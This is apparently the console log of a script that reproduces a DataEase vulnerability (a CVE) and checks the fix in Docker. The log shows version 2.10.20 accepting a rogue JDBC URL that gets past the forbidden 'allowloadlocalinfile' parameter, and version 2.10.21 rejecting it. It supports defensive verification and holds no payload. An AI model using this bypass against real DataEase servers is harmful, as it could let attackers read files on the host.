[*] Ensuring Docker images are available...

==========================================
[1] Testing VULNERABLE version (v2.10.20)
==========================================
0377b9aca68595f28d37b59d23ce2b6d11ee5b05e2a028ac28da194c72782d63
[*] Waiting for DataEase API to respond on port 18100...
[*] DataEase is responding on port 18100
[*] Sending malicious datasource validate request...
[*] Vulnerable version response:
{"code":40001,"msg":"DEException(code=40001, msg=Communications link failure\n\nThe last packet sent successfully to the server was 0 milliseconds ago. The driver has not received any packets from the server.)","data":null}

[PASS] Vulnerable version confirmed: forbidden parameter bypassed.
       The server tried to connect to the rogue JDBC URL instead of rejecting it.
dataease-vuln

==========================================
[2] Testing FIXED version (v2.10.21)
==========================================
dc47329567870877c64669752568641773fe89d8fe1b3684ecc2247b87d57c41
[*] Waiting for DataEase API to respond on port 18101...
[*] DataEase is responding on port 18101
[*] Sending malicious datasource validate request...
[*] Fixed version response:
{"code":40001,"msg":"DEException(code=40001, msg=Illegal parameter: allowloadlocalinfile)","data":null}

[PASS] Fixed version confirmed: forbidden parameter blocked.
dataease-fix

==========================================
SUMMARY
==========================================
SUCCESS: CVE-2026-40899 reproduced and fix verified.
[*] Cleaning up containers...